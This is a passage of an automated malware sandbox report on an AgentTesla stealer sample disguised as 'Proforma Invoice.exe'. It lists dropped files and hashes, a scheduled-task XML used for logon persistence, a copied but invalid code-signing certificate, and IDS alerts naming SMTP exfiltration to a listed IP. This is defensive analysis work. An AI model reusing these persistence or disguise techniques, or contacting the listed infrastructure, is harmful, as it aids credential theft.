	https://cloudflare-ipfs.com/ipfs/bafkreidireckoznexfjfbsxswt7f6nvtvuhh43w7uthmbwiqbpqvcwfpny	Get hash	malicious	HTMLPhisher	Browse	104.17.64.14
	https://www.qiodwbu.cn/	Get hash	malicious	Unknown	Browse	104.18.36.155

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Doc-0113687pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	172.67.74.152
	Scanned-Statement_Pov03499727628966122376398775274656600052690463249885.wsf	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://www.ungrbly.cn/	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://libbycolon.autos/serene/dune/?box=violet	Get hash	malicious	TechSupportScam	Browse	172.67.74.152
	https://en-us.secureconnection.moneytransaction.kb4.io	Get hash	malicious	Unknown	Browse	172.67.74.152
	Arrival Notice.pif.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	bTHf.exe	Get hash	malicious	Njrat	Browse	172.67.74.152
	bTGj.exe	Get hash	malicious	Njrat	Browse	172.67.74.152
	bTHf.exe	Get hash	malicious	Njrat	Browse	172.67.74.152
	bTGj.exe	Get hash	malicious	Njrat	Browse	172.67.74.152

Process:	C:\Users\user\Desktop\Proforma Invoice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VoAlKljQu.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\VoAlKljQu.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380192968514367
Encrypted:	false
SSDEEP:	48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeoPUyus:+LHyIFKL3IZ2KRH9OugYs
MD5:	9AA3EC09E507E3B6521730FDDCF550A3
SHA1:	19E688C78EB2FBE0D620C0055293DA06411512D0
SHA-256:	E50F69B84C0E4B5D2CFE80C5B7B4AF6398A862F098D06B138388F7D49ABAB0B8
SHA-512:	04B3A49C7FB0DFFF413095AB046296C779A1978D64CDAE35858435A5E41221AE6726421F1FB116EBF7E2DB314602A544F5C8AD7F0F96FCC04D694AD6C1E78E81
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21qvef1k.kab.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jojjulcy.ejo.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1ltnulj.opo.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ntgtiuiq.4me.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ny0bxjpr.nxg.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_olmghyzu.30z.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tvg1abqw.m3v.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ygndzoki.ccv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp

Download File

Process:	C:\Users\user\Desktop\Proforma Invoice.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1575
Entropy (8bit):	5.115544302810953
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta0xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTzv
MD5:	FD0560D8582557F958EB4392541DD9EA
SHA1:	69A1AC40194171B47F55362E4D1D9B6AD38E1268
SHA-256:	C75D1F9E985B3BC08132C78B895C74C4A4E1A94082C3157226345AF30B858149
SHA-512:	A327F4EE084C4C0BAA65353AB2D08466DC8ADDFC9FE865EED215E66B3122E57A48590C3B3557704A4F544F41880CFE7420709D30B1551670475AB3ECB57F4B97
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmp3C70.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\VoAlKljQu.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1575
Entropy (8bit):	5.115544302810953
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta0xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTzv
MD5:	FD0560D8582557F958EB4392541DD9EA
SHA1:	69A1AC40194171B47F55362E4D1D9B6AD38E1268
SHA-256:	C75D1F9E985B3BC08132C78B895C74C4A4E1A94082C3157226345AF30B858149
SHA-512:	A327F4EE084C4C0BAA65353AB2D08466DC8ADDFC9FE865EED215E66B3122E57A48590C3B3557704A4F544F41880CFE7420709D30B1551670475AB3ECB57F4B97
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\VoAlKljQu.exe

Download File

Process:	C:\Users\user\Desktop\Proforma Invoice.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	737288
Entropy (8bit):	7.964743026999287
Encrypted:	false
SSDEEP:	12288:1lW33mzBh35KR3kWhUlZ/WYjJsRVFYF/Iu65Ho3ZFQYATaFX21Q9NtS8zVjBwCkR:rBwRbqZ/H1sRbW/Iu6FoJFJATAX21Q9A
MD5:	B774CA62D4F7E4A8359A40C7CAD50DDB
SHA1:	09467EA941B0C2C65CF908419847A7B3F948CC44
SHA-256:	B9008D07600AF358E885FE396B52BBC6EFBC135F7010E6AA6849C3AF952DD9FB
SHA-512:	73E6C2C67CDBA72866316DDD6010F9A289AB75DAC8F3228A749EC1595D94C18E10B8890F77978004341A762874845DDF7B1785F388CC956B38A99EAABAB5A2A7
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63% Antivirus: Virustotal, Detection: 65%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P..e..............0......$......r.... ... ....@.. ....................................@................................. ...O.... ..X ...............6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc...X ... ..."..................@..@.reloc.......`......................@..B................T.......H.......pb..@T......Y.......pK..........................................V.(.....(....X.(....X#......Y@#.....p.@..s....}.....s(...}.....s....}.....(.....(.....{.....{....o.....0..x.......r...pr...pr...ps#......{....o....o......{....o....o......{....o....o......{....o....o....o.....{.....o....&.{.....o....F.{....r'..po ...F.{....r'..po ....0...........{....(!....r)..p.("....0..R.......r)..p(#...(...+o%....+!..(&.....{.....o.....{.....o....&..('...-...........o(....*..

C:\Users\user\AppData\Roaming\VoAlKljQu.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Proforma Invoice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.964743026999287
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Proforma Invoice.exe
File size:	737'288 bytes
MD5:	b774ca62d4f7e4a8359a40c7cad50ddb
SHA1:	09467ea941b0c2c65cf908419847a7b3f948cc44
SHA256:	b9008d07600af358e885fe396b52bbc6efbc135f7010e6aa6849c3af952dd9fb
SHA512:	73e6c2c67cdba72866316ddd6010f9a289ab75dac8f3228a749ec1595d94c18e10b8890f77978004341a762874845ddf7b1785f388cc956b38a99eaabab5a2a7
SSDEEP:	12288:1lW33mzBh35KR3kWhUlZ/WYjJsRVFYF/Iu65Ho3ZFQYATaFX21Q9NtS8zVjBwCkR:rBwRbqZ/H1sRbW/Iu6FoJFJATAX21Q9A
TLSH:	14F4234C7F748A93CD7B8BB52064525287F262C53829F6E8ACC571DED2E6F48A712D03
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P..e..............0......$......r.... ... ....@.. ....................................@................................

File Icon


Icon Hash:	0f2952b2b2562b8e

Static PE Info

General

Entrypoint:	0x4b0272
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x65D7F750 [Fri Feb 23 01:39:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 00:00:00 08/11/2021 23:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
xor al, 47h
xor al, 51h
aaa
cmp byte ptr [ecx+49h], al
inc edi
xor al, 50h
xor bl, byte ptr [ecx+34h]
aaa
cmp byte ptr [32383847h], dh
xor eax, 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb0220	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb2000	0x2058	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xb0a00	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xae290	0xae400	b2bb2f3424444c3aa648e7ac14114484	False	0.9631133989418939	data	7.971460179462412	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb2000	0x2058	0x2200	8a161d22b3f5ecfbe9abd64fad2b5bba	False	0.8448988970588235	data	7.374338760112415	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb6000	0xc	0x200	bd3d4dc1b342fb7433140a3fccba8cd4	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xb2100	0x1a27	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9796863330843913
RT_GROUP_ICON	0xb3b38	0x14	data	1.05
RT_VERSION	0xb3b5c	0x2fc	data	0.45418848167539266
RT_MANIFEST	0xb3e68	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/27/24-08:27:06.420135	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49739	587	192.168.2.4	50.87.139.143
02/27/24-08:27:03.102734	TCP	2855542	ETPRO TROJAN Agent Tesla CnC Exfil Activity	49736	587	192.168.2.4	50.87.139.143
02/27/24-08:27:03.102734	TCP	2855245	ETPRO TROJAN Agent Tesla Exfil via SMTP	49736	587	192.168.2.4	50.87.139.143
02/27/24-08:27:03.102734	TCP	2840032	ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	49736	587	192.168.2.4	50.87.139.143
02/27/24-08:27:06.420135	TCP	2855542	ETPRO TROJAN Agent Tesla CnC Exfil Activity	49739	587	192.168.2.4	50.87.139.143
02/27/24-08:27:06.420135	TCP	2855245	ETPRO TROJAN Agent Tesla Exfil via SMTP	49739	587	192.168.2.4	50.87.139.143
02/27/24-08:27:06.420135	TCP	2840032	ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	49739	587	192.168.2.4	50.87.139.143
02/27/24-08:27:06.420071	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49739	587	192.168.2.4	50.87.139.143
02/27/24-08:27:03.102734	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49736	587	192.168.2.4	50.87.139.143
02/27/24-08:27:03.102734	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49736	587	192.168.2.4	50.87.139.143

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 27, 2024 08:26:57.856971979 CET	49734	443	192.168.2.4	172.67.74.152
Feb 27, 2024 08:26:57.857031107 CET	443	49734	172.67.74.152	192.168.2.4
Feb 27, 2024 08:26:57.857104063 CET	49734	443	192.168.2.4	172.67.74.152
